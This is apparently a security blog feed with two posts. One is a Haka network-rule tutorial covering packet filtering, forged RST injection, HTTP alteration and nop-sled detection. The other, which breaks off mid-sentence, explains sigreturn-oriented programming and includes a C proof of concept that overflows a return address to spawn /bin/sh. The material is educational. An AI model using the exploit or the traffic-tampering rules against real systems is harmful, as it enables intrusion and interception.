<span class="n">description</span> <span class="o">=</span> <span class="s2">"connection refused"</span><span class="p">,</span>
<span class="n">start_time</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">ip</span><span class="p">.</span><span class="n">raw</span><span class="p">.</span><span class="n">timestamp</span>
<span class="p">}</span>
<span class="n">flow</span><span class="p">:</span><span class="n">drop</span><span class="p">()</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="p">}</span></code></pre></figure>
<p>The first lines load the required protocol dissectors, namely, ipv4 and tcp
connection dissectors. The first one handles ipv4 packets. The latter is a
stateful tcp dissector that maintains a connection table and manages tcp
streams. The next line, defines the network address that must be blocked.</p>
<p>The security rule is defined through haka.rule keyword. A security rule is made
of a hook and a evaluation function eval. The hook is an event that will
trigger the evaluation of the security rule. In this example, the security rule
will be evaluated at each tcp connection establishment attempt. The parameters
passed to the evaluation function depend on the event. In the case of
new_connection event, eval takes two parameters: flow and pkt. The first one
holds details about the connection and the latter is a table containing all tcp
(and lower layer) packet fields.</p>
<p>In the core of the security rule, we log (haka.log) first some information
about the current connection. Then, we check if the source address belongs to
the range of non-authorized IP addresses defined previously. If this test
succeeds, we raise an alert (haka.alert) and drop the connection. Note that we
reported only few details in the alert. One can add more information such as
the source and the targeted service.</p>
<p>We use hakapcap tool to test our rule <a href="/downloads/haka/filter.lua">filter.lua</a>
on a pcap trace file <a href="/downloads/haka/filter.pcap">filter.pcap</a>:</p>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">$</span><span class="w"> </span>hakapcap filter.lua filter.pcap</code></pre></figure>
<p>Hereafter, is the output of Haka which dumps some info about loaded dissectors
and registered rules. The output shows that Haka succeeded to block connections
targeting 192.168.101.62 address:</p>
<p><img src="/images/haka_filter.png" alt="" /></p>
<p>In the above example, we have defined a single rule to block connections. One
can write a complete firewall-like rule set using the haka.group keyword. In
this configuration case, one can choose a default behavior (e.g. block all
connections) if none of the security rule belonging to the group explicitly
authorizes the traffic.</p>
<h3 id="packet-injection">Packet Injection</h3>
<p>In Haka, one can create new packets and inject them. The following rule crafts
an RST packet in order to fool a Xmas nmap scan. As as result, nmap will
conclude that all ports are closed on target side.</p>
<figure class="highlight"><pre><code class="language-lua" data-lang="lua"><span class="n">raw</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/raw"</span><span class="p">)</span>
<span class="n">ipv4</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/ipv4"</span><span class="p">)</span>
<span class="n">tcp</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/tcp"</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">rule</span> <span class="p">{</span>
<span class="n">hook</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">events</span><span class="p">.</span><span class="n">receive_packet</span><span class="p">,</span>
<span class="n">eval</span> <span class="o">=</span> <span class="k">function</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">flags</span>
<span class="c1">-- test for xmas nmap scans</span>
<span class="k">if</span> <span class="n">flags</span><span class="p">.</span><span class="n">fin</span> <span class="ow">and</span> <span class="n">flags</span><span class="p">.</span><span class="n">psh</span> <span class="ow">and</span> <span class="n">flags</span><span class="p">.</span><span class="n">urg</span> <span class="k">then</span>
<span class="c1">-- raw packet</span>
<span class="kd">local</span> <span class="n">rstpkt</span> <span class="o">=</span> <span class="n">raw</span><span class="p">.</span><span class="n">create</span><span class="p">()</span>
<span class="c1">-- ip packet</span>
<span class="n">rstpkt</span> <span class="o">=</span> <span class="n">ipv4</span><span class="p">.</span><span class="n">create</span><span class="p">(</span><span class="n">rstpkt</span><span class="p">)</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">ttl</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">ip</span><span class="p">.</span><span class="n">ttl</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">dst</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">src</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">ip</span><span class="p">.</span><span class="n">dst</span>
<span class="c1">-- tcp packet</span>
<span class="n">rstpkt</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">create</span><span class="p">(</span><span class="n">rstpkt</span><span class="p">)</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">srcport</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">dstport</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">dstport</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">srcport</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">flags</span><span class="p">.</span><span class="n">rst</span> <span class="o">=</span> <span class="kc">true</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">flags</span><span class="p">.</span><span class="n">ack</span> <span class="o">=</span> <span class="kc">true</span>
<span class="n">rstpkt</span><span class="p">.</span><span class="n">ack_seq</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">seq</span> <span class="o">+</span> <span class="mi">1</span>
<span class="c1">-- inject forged packet and</span>
<span class="c1">-- drop malicious scanning packet</span>
<span class="n">rstpkt</span><span class="p">:</span><span class="n">send</span><span class="p">()</span>
<span class="n">pkt</span><span class="p">:</span><span class="n">drop</span><span class="p">()</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="p">}</span></code></pre></figure>
<h3 id="packet-altering">Packet Altering</h3>
<p>Packet modification is one of the most advanced feature of Haka. Haka handles
automatically all internal modifications at stream and packet level: resizing
and fragmenting packets, resetting sequence numbers, etc. The following example
shows how easy it is to access and modify protocol fields. This rule alters
some headers of http protocol. More precisely, the user-agent header will be
modified (or added to the list of headers if not set), and the accept-encoding
header will be removed.</p>
<figure class="highlight"><pre><code class="language-lua" data-lang="lua"><span class="kd">local</span> <span class="n">http</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/http"</span><span class="p">)</span>
<span class="n">http</span><span class="p">.</span><span class="n">install_tcp_rule</span><span class="p">(</span><span class="mi">80</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">rule</span> <span class="p">{</span>
<span class="n">hook</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">events</span><span class="p">.</span><span class="n">request</span><span class="p">,</span>
<span class="n">eval</span> <span class="o">=</span> <span class="k">function</span> <span class="p">(</span><span class="n">flow</span><span class="p">,</span> <span class="n">request</span><span class="p">)</span>
<span class="n">request</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="s2">"User-Agent"</span><span class="p">]</span> <span class="o">=</span> <span class="s2">"HAKA User Agent"</span>
<span class="n">request</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="s2">"Accept-Encoding"</span><span class="p">]</span> <span class="o">=</span> <span class="kc">nil</span>
<span class="k">end</span>
<span class="p">}</span></code></pre></figure>
<p><a href="https://www.paulfariello.fr/assets/blurring-the-web.lua">blurring-the-web</a> and
<a href="https://thisiscybersec.files.wordpress.com/2015/11/inject-ponies.zip">inject_ponies</a>
are funny scripts that alter http response traffic in order to blur and pollute
(inject garbage) requested web pages, respectively:</p>
<p><a href="/images/haka_blur.png"><img src="/images/haka_blur.png" alt="haka-blur" width="290px" /></a>
<a href="/images/haka_ponies.png"><img src="/images/haka_ponies.png" alt="haka-ponies" width="290px" /></a></p>
<h3 id="stream-filtering">Stream Filtering</h3>
<p>Before presenting stream filtering, we will present first how Haka manages
packets and streams internally. In Haka, all packets and streams are
represented by virtual buffers (see figure below). Virtual buffers are a
unified view of non-adjacent blocks of memory. They allow an easy and efficient
modification of memory data. Virtual buffers use scattered lists to represent
non-contiguous chunks which avoids allocating and copying superfluous block of
memory. Haka provides iterators to navigate through these blocks of memory.
These iterators could be blocking which would enable some functions to suspend
and then resume transparently their execution when more data is available on
the stream for instance.</p>
<p><img src="/images/haka_vbuffer.png" alt="" /></p>
<p>The following rule collects http streams and dumps them on stdout. This rule is
equivalent to the “follow tcp stream” feature of Wireshark.</p>
<figure class="highlight"><pre><code class="language-lua" data-lang="lua"><span class="kd">local</span> <span class="n">ipv4</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s1">'protocol/ipv4'</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">tcp_connection</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s1">'protocol/tcp_connection'</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">rule</span> <span class="p">{</span>
<span class="n">hook</span> <span class="o">=</span> <span class="n">tcp_connection</span><span class="p">.</span><span class="n">events</span><span class="p">.</span><span class="n">receive_data</span><span class="p">,</span>
<span class="n">options</span> <span class="o">=</span> <span class="p">{</span>
<span class="n">streamed</span> <span class="o">=</span> <span class="kc">true</span>
<span class="p">},</span>
<span class="n">eval</span> <span class="o">=</span> <span class="k">function</span> <span class="p">(</span><span class="n">flow</span><span class="p">,</span> <span class="n">iter</span><span class="p">,</span> <span class="n">dir</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">data</span> <span class="o">=</span> <span class="n">flow</span><span class="p">.</span><span class="n">ccdata</span> <span class="ow">or</span> <span class="p">{}</span>
<span class="n">flow</span><span class="p">.</span><span class="n">ccdata</span> <span class="o">=</span> <span class="n">data</span>
<span class="k">while</span> <span class="n">iter</span><span class="p">:</span><span class="n">wait</span><span class="p">()</span> <span class="k">do</span>
<span class="n">data</span><span class="p">[</span><span class="o">#</span><span class="n">data</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">iter</span><span class="p">:</span><span class="n">sub</span><span class="p">(</span><span class="s1">'available'</span><span class="p">):</span><span class="n">asstring</span><span class="p">()</span>
<span class="k">end</span>
<span class="n">haka</span><span class="p">.</span><span class="n">log</span><span class="p">(</span><span class="s2">"%s -> %s:\n"</span><span class="p">,</span> <span class="n">flow</span><span class="p">.</span><span class="n">srcip</span><span class="p">,</span> <span class="n">flow</span><span class="p">.</span><span class="n">dstip</span><span class="p">)</span>
<span class="nb">io.write</span><span class="p">(</span><span class="nb">table.concat</span><span class="p">(</span><span class="n">data</span><span class="p">))</span>
<span class="k">end</span>
<span class="p">}</span></code></pre></figure>
<h3 id="interactive-packet-filtering">Interactive Packet Filtering</h3>
<blockquote>
<p>“Wait, it’s like gdb but for packets !!” – Anonymous Haka user</p>
</blockquote>
<p>This is my favorite feature of Haka. It allows inspecting the traffic packet per
packet. All the magic starts with the following rule which will prompt a shell
for each http POST request.</p>
<figure class="highlight"><pre><code class="language-lua" data-lang="lua"><span class="kd">local</span> <span class="n">http</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/http"</span><span class="p">)</span>
<span class="n">http</span><span class="p">.</span><span class="n">install_tcp_rule</span><span class="p">(</span><span class="mi">80</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">rule</span> <span class="p">{</span>
<span class="n">hook</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">events</span><span class="p">.</span><span class="n">request_data</span><span class="p">,</span>
<span class="n">eval</span> <span class="o">=</span> <span class="k">function</span> <span class="p">(</span><span class="n">http</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">interactive_rule</span><span class="p">(</span><span class="s2">"interactive mode"</span><span class="p">)(</span><span class="n">http</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
<span class="k">end</span>
<span class="p">}</span>
<span class="n">haka</span><span class="p">.</span><span class="n">rule</span> <span class="p">{</span>
<span class="n">hook</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">events</span><span class="p">.</span><span class="n">request</span><span class="p">,</span>
<span class="n">eval</span> <span class="o">=</span> <span class="k">function</span> <span class="p">(</span><span class="n">http</span><span class="p">,</span> <span class="n">request</span><span class="p">)</span>
<span class="n">http</span><span class="p">:</span><span class="n">enable_data_modification</span><span class="p">()</span>
<span class="k">end</span>
<span class="p">}</span></code></pre></figure>
<p>The shell gives access to the full Haka API to play with packet content: accessing
and modifying packet fields, dropping packets, logging suspicious events,
alerting, etc. The Lua console supports auto-completion and therefore is a good
starting point to dive into the Haka API.</p>
<p>As shown by the following output, Haka breaks on the first POST request. Http
data are available through the inputs variable. In this example, we alter the
user credentials on the fly.</p>
<p>Note that it is best to use the interactive rule on pcap files as the edition
will add a substantial delay.</p>
<h3 id="advanced-stream-filtering">Advanced Stream Filtering</h3>
<p>Haka features a pattern matching engine and disassembler modules. These two
modules are stream-based which enables us to detect a malicious payload
scattered over multiple packets for instance. The following rule, uses a
regular expression to detect a nop sled. We enable the streamed option which
means that the matching function will block and wait for data to be available
to proceed with matching. If a nop sled is detected, we raise an alert and dump
the shellcode instruction. Note that the pattern matching function updates the
iterator position which points afterwards to the shellcode.</p>
<figure class="highlight"><pre><code class="language-lua" data-lang="lua"><span class="kd">local</span> <span class="n">tcp</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"protocol/tcp_connection"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">rem</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"regexp/pcre"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">re</span> <span class="o">=</span> <span class="n">rem</span><span class="p">.</span><span class="n">re</span><span class="p">:</span><span class="n">compile</span><span class="p">(</span><span class="s2">"%x90{100,}"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">asm</span> <span class="o">=</span> <span class="nb">require</span><span class="p">(</span><span class="s2">"misc/asm"</span><span class="p">)</span>
<span class="kd">local</span> <span class="n">dasm</span> <span class="o">=</span> <span class="n">asm</span><span class="p">.</span><span class="n">new_disassembler</span><span class="p">(</span><span class="s2">"x86"</span><span class="p">,</span> <span class="s2">"32"</span><span class="p">)</span>
<span class="n">haka</span><span class="p">.</span><span class="n">rule</span> <span class="p">{</span>
<span class="n">hook</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">events</span><span class="p">.</span><span class="n">receive_data</span><span class="p">,</span>
<span class="n">options</span> <span class="o">=</span> <span class="p">{</span>
<span class="n">streamed</span> <span class="o">=</span> <span class="kc">true</span><span class="p">,</span>
<span class="p">},</span>
<span class="n">eval</span> <span class="o">=</span> <span class="k">function</span> <span class="p">(</span><span class="n">flow</span><span class="p">,</span> <span class="n">iter</span><span class="p">,</span> <span class="n">direction</span><span class="p">)</span>
<span class="k">if</span> <span class="n">re</span><span class="p">:</span><span class="n">match</span><span class="p">(</span><span class="n">iter</span><span class="p">,</span> <span class="kc">false</span><span class="p">)</span> <span class="k">then</span>
<span class="c1">-- raise an alert</span>
<span class="n">haka</span><span class="p">.</span><span class="n">alert</span><span class="p">{</span>
<span class="n">description</span> <span class="o">=</span> <span class="s2">"nop sled detected"</span><span class="p">,</span>
<span class="p">}</span>
<span class="c1">-- dump instructions following nop sled</span>
<span class="n">dasm</span><span class="p">:</span><span class="n">dump_instructions</span><span class="p">(</span><span class="n">iter</span><span class="p">)</span>
<span class="k">end</span>
<span class="k">end</span>
<span class="p">}</span></code></pre></figure>
<p>Replaying this rule on the well-known <a href="https://www.honeynet.org/node/504">network forensic
challenge</a> results on the following output.
More details about disassembling network traffic into instruction are available
<a href="http://www.haka-security.org/blog/2015/06/23/instruction-disassembly.html">here</a>.</p>
<p><img src="/images/haka_asm.png" alt="" /></p>
<h2 id="links">Links</h2>
<ul>
<li><a href="haka-security.org">Haka web-site</a></li>
<li><a href="https://github.com/haka-security/haka">Haka source code</a></li>
<li><a href="@hakasecurity">Haka on twitter</a></li>
</ul>
<!-- image references -->Haka is an open source network security oriented language that allows writing security rules and protocol dissectors. In this first part of a two-part series, we will focus on writing security rules.Playing with signals: An overview on sigreturn oriented programming2015-01-03T08:52:43+00:002015-01-03T08:52:43+00:00/exploit,/sigreturn/oriented/programming/2015/01/03/playing-with-signals<p>Back to last GreHack edition, Herbert Bos has presented a novel technique to
exploit stack-based overflows more reliably on Linux. We review hereafter this
new exploitation technique and provide an exploit along with the vulnerable
server. Even if this technique is portable to multiple platforms, we will focus
on a 64-bit Linux OS in this blog post.</p>
<p>All sample code used in this blogpost is available for download
<a href="https://github.com/mtalbi/write-up/tree/master/srop">here</a></p>
<h2 id="weve-got-a-signal">We’ve got a signal</h2>
<p>When the kernel delivers a signal, it creates a frame on the stack where it
stores the current execution context (flags, registers, etc.) and then gives
the control to the signal handler. After handling the signal, the kernel calls
sigreturn to resume the execution. More precisely, the kernel uses the
following structure pushed previously on the stack to recover the process
context. A closer look at this structure is given by figure 1.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="k">struct</span> <span class="n">ucontext</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">int</span> <span class="n">uc_flags</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">ucontext</span> <span class="o">*</span><span class="n">uc_link</span><span class="p">;</span>
<span class="n">stack_t</span> <span class="n">uc_stack</span><span class="p">;</span>
<span class="n">mcontext_t</span> <span class="n">uc_mcontext</span><span class="p">;</span>
<span class="n">__sigset_t</span> <span class="n">uc_sigmask</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">_libc_fpstate</span> <span class="n">__fpregs_mem</span><span class="p">;</span>
<span class="p">}</span> <span class="n">ucontext_t</span><span class="p">;</span></code></pre></figure>
<p>Now, let’s debug the following program (sig.c) to see what really happens when
handling a signal on Linux. This program simply registers a signal handler to
manage SIGINT signals.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <signal.h>
</span>
<span class="kt">void</span> <span class="nf">handle_signal</span><span class="p">(</span><span class="kt">int</span> <span class="n">signum</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"handling signal: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">signum</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">signal</span><span class="p">(</span><span class="n">SIGINT</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">handle_signal</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"catch me if you can</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* struct definition for debugging purpose */</span>
<span class="k">struct</span> <span class="n">sigcontext</span> <span class="n">sigcontext</span><span class="p">;</span></code></pre></figure>
<p>First of all, we need to tell gdb to not intercept this signal:</p>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">gdb$</span><span class="w"> </span>handle SIGINT nostop pass
<span class="go">Signal Stop Print Pass to program Description
SIGINT No Yes Yes Interrupt</span></code></pre></figure>
<p>Then, we set a breakpoint at the signal handling function, start the program
and hit CTRLˆC to reach the signal handler code.</p>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">gdb$</span><span class="w"> </span>b handle_signal
<span class="go">Breakpoint 1 at 0x4005a7: file sig.c, line 6.
</span><span class="gp">gdb$</span><span class="w"> </span>r
<span class="go">Starting program: /home/mtalbi/sig
hit CTRL^C to catch me
^C
Program received signal SIGINT, Interrupt.
Breakpoint 1, handle_signal (signum=0x2) at sig.c:6
</span><span class="gp">6 printf("handling signal: %d", signum);</span><span class="w">
</span><span class="gp">gdb$</span><span class="w"> </span>bt
<span class="gp">#</span>0 handle_signal <span class="o">(</span><span class="nv">signum</span><span class="o">=</span>0x2<span class="o">)</span> at sig.c:6
<span class="gp">#</span>1 <signal handler called>
<span class="gp">#</span>2 main <span class="o">()</span> at sig.c:13</code></pre></figure>
<p>We note here that the frame #1 is created in order to resume the process
execution at the point where it was interrupted before. This is confirmed by
checking the instructions pointed by rip which corresponds to sigreturn
syscall:</p>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">gdb$</span><span class="w"> </span>frame 1
<span class="gp">#</span>1 <signal handler called>
<span class="gp">gdb$</span><span class="w"> </span>x/2i <span class="nv">$rip</span>
<span class="gp">=></span><span class="w"> </span>0x7ffff7a844f0: mov <span class="nv">$0xf</span>,%rax
<span class="go"> 0x7ffff7a844f7: syscall </span></code></pre></figure>
<p>Figure 1 shows the stack at signal handling function entry point.</p>
<p><img src="/images/srop_stack.png" alt="" width="300px" class="center" />
<em>Figure 1: Stack at signal handling function entry point</em></p>
<p>We can check the values of some saved registers and flags. Note that sigcontext
structure is the same as uc_mcontext structure. It is located at rbp + 7 * 8
according to figure 1. It holds saved registers and flags value:</p>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">gdb$</span><span class="w"> </span>frame 0
<span class="c">...
</span><span class="gp">gdb$</span><span class="w"> </span>p <span class="o">((</span>struct sigcontext <span class="k">*</span><span class="o">)(</span><span class="nv">$rbp</span> + 7 <span class="k">*</span> 8<span class="o">))</span>->rip
<span class="gp">$</span>5 <span class="o">=</span> 0x4005da
<span class="gp">gdb$</span><span class="w"> </span>p <span class="o">((</span>struct sigcontext <span class="k">*</span><span class="o">)(</span><span class="nv">$rbp</span> + 7 <span class="k">*</span> 8<span class="o">))</span>->rsp
<span class="gp">$</span>6 <span class="o">=</span> 0x7fffffffe110
<span class="gp">gdb$</span><span class="w"> </span>p <span class="o">((</span>struct sigcontext <span class="k">*</span><span class="o">)(</span><span class="nv">$rbp</span> + 7 <span class="k">*</span> 8<span class="o">))</span>->rax
<span class="gp">$</span>7 <span class="o">=</span> 0x17
<span class="gp">gdb$</span><span class="w"> </span>p <span class="o">((</span>struct sigcontext <span class="k">*</span><span class="o">)(</span><span class="nv">$rbp</span> + 7 <span class="k">*</span> 8<span class="o">))</span>->cs
<span class="gp">$</span>8 <span class="o">=</span> 0x33
<span class="gp">gdb$</span><span class="w"> </span>p <span class="o">((</span>struct sigcontext <span class="k">*</span><span class="o">)(</span><span class="nv">$rbp</span> + 7 <span class="k">*</span> 8<span class="o">))</span>->eflags
<span class="gp">$</span>9 <span class="o">=</span> 0x202</code></pre></figure>
<p>Now, we can verify that after handling the signal, registers will recover their
values:</p>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">gdb$</span><span class="w"> </span>b 13
<span class="go">Breakpoint 2 at 0x4005da: file sig.c, line 13.
</span><span class="gp">gdb$</span><span class="w"> </span>c
<span class="go">Continuing.
handling signal: 2
Breakpoint 2, main () at sig.c:13
13 while(1) {}
</span><span class="gp">gdb$</span><span class="w"> </span>i r
<span class="c">...
</span><span class="go">rax 0x17 0x17
rsp 0x7fffffffe110 0x7fffffffe110
eflags 0x202 [ IF ]
cs 0x33 0x33
</span><span class="c">...</span></code></pre></figure>
<h2 id="exploitation">Exploitation</h2>
<p>If we manage to overflow a saved instruction pointer with sigreturn address and
forge a uc mcontext structure by adjusting registers and flags values, then we
can execute any syscall. It may be a litte confusing here. In effect, trying to
execute a syscall by returning on another syscall (sigreturn) may be strange at
first sight. Well, the main difference here is that the latter does not require
any parameters at all. All we need is a gadget that sets rax to 0xf to run any
system call through sigreturn syscall. Gadgets are small pieces of instructions
ending with a ret instruction. These gadgets are chained together to perform a
specific action. This technique is well-known as ROP: Return-Oriented
Programming [Sha07].</p>
<p>Surprisingly, it is quite easy to find a syscall ; ret gadget on some Linux
distribution where the vsyscall map is still in use. The vsyscall page is
mapped at fixed location into all user-space processes. For interested readers,
here is good link about vsyscall.</p>
<figure class="highlight"><pre><code class="language-terminal" data-lang="terminal"><span class="gp">mtalbi@mtalbi:/home/mtalbi/srop$</span><span class="w"> </span><span class="nb">cat</span> /proc/self/maps
<span class="c">...
</span><span class="go">7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
</span><span class="c">...
</span><span class="gp">gdb$</span><span class="w"> </span>x/3i 0xffffffffff600000
<span class="go"> 0xffffffffff600000: mov rax,0x60
0xffffffffff600007: syscall
0xffffffffff600009: ret </span></code></pre></figure>
<p>Bosman and Bos list in [BB14] locations of sigreturn and syscall gadgets for
different operating systems including FreeBSD and Mac OS X.</p>
<p>Assumed that we found the required gadgets, we need to arrange our payload as
shown in figure 3 in order to successfully exploit a classic stack-based
overflow. Note that zeroes should be allowed in the payload (e.g. a non strcpy
vulnerability); otherwise, we need to find a way to zero some parts of
uc_mcontext structure.</p>
<p>The following code (srop.c) is a proof of concept of sigreturn oriented
programming that starts a /bin/sh shell:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include <stdio.h>
#include <string.h>
#include <signal.h>
</span>
<span class="cp">#define SYSCALL 0xffffffffff600007
</span>
<span class="k">struct</span> <span class="n">ucontext</span> <span class="n">ctx</span><span class="p">;</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">shell</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">};</span>
<span class="kt">void</span> <span class="nf">gadget</span><span class="p">();</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">ret</span><span class="p">;</span>
<span class="cm">/* initializing the context structure */</span>
<span class="n">bzero</span><span class="p">(</span><span class="o">&</span><span class="n">ctx</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">ucontext</span><span class="p">));</span>
<span class="cm">/* setting rip value (points to syscall address) */</span>
<span class="n">ctx</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="n">SYSCALL</span><span class="p">;</span>
<span class="cm">/* setting 0x3b in rax (execve syscall) */</span>
<span class="n">ctx</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x3b</span><span class="p">;</span>
<span class="cm">/* setting first arg of execve in rdi */</span>
<span class="n">ctx</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">shell</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="cm">/* setting second arg of execv in rsi */</span>
<span class="n">ctx</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="n">shell</span><span class="p">;</span>
<span class="cm">/* cs = 0x33 */</span>
<span class="n">ctx</span><span class="p">.</span><span class="n">uc_mcontext</span><span class="p">.</span><span class="n">gregs</span><span class="p">[</span><span class="mi">18</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x33</span><span class="p">;</span>
<span class="cm">/* overflowing */</span>
<span class="n">ret</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">ret</span> <span class="o">+</span> <span class="mi">2</span><span class="p">;</span>
<span class="o">*</span><span class="n">ret</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">gadget</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span> <span class="c1">//skip gadget's function prologue</span>
<span class="o">*</span><span class="p">(</span><span class="n">ret</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">=</span> <span class="n">SYSCALL</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">ret</span> <span class="o">+</span> <span class="mi">2</span><span class="p">,</span> <span class="o">&</span><span class="n">ctx</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">ucontext</span><span class="p">));</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">gadget</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">asm</span><span class="p">(</span><span class="s">"mov $0xf,%rax</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">asm</span><span class="p">(</span><span class="s">"retq</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>The programm fills a uc_mcontext structure with execve syscall parameters.
Additionally, the cs register is set to 0x33:</p>
<ul>
<li>Instruction pointer rip points to syscall; ret gadget.</li>
<li>rax register holds execve syscall number.</li>
<li>rdi register holds the first paramater of execve (“/bin/sh” address).</li>
<li>rsi register holds the second parameter of execve (“/bin/sh” arguments).</li>
<li>rdx register holds the last parameter of execve (zeroed at struture initialization).</li>
</ul>
<p>Then, the program overflows the saved rip pointer with mov %rax, $0xf; ret
gadget address (added artificially to the program through gadget function).
This gadget is followed by the syscall gadget address. So, when the main
function will return, these two gadgets will be executed resulting in sigreturn
system call which will set registers values from the previously filled
